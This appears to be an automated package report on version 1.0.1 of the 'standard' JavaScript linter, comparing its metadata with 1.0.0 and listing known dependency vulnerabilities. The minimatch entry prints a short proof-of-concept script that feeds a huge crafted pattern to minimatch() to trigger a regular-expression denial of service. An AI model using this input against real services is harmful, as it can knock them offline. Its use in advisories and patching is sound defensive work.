Standard, a popular JavaScript linter, underwent a minor version update from 1.0.0 to 1.0.1 on January 27, 2015, within approximately 40 minutes of each other. Both versions maintain identical core dependencies, including find, jscs, split, and jshint, suggesting the update wasn't focused on underlying code analysis tools. The 'description' field changes slightly, with 1.0.0 describing the package as enforcing 'code style standards' while 1.0.1 uses the more specific wording 'JavaScript Standard Style' representing perhaps a brand consolidation.
For Javascript developers, the core functionality, centered around enforcing a consistent code style, remains unchanged, so the update is unlikely to cause compatibility issues or require significant code adjustments. The consistent dependencies also suggest stability and a continued commitment to these core tools.
The repository, author, and license information are uniform across both releases, reinforcing the project's stability and open-source nature. Developers can confidently rely on the same Git repository and author for support and contributions. Ultimately, the 1.0.1 update is a minor refinement, possibly addressing bug fixes or documentation improvements, although specific details aren't explicitly provided in the metadata.
All the vulnerabilities related to the version 1.0.1 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.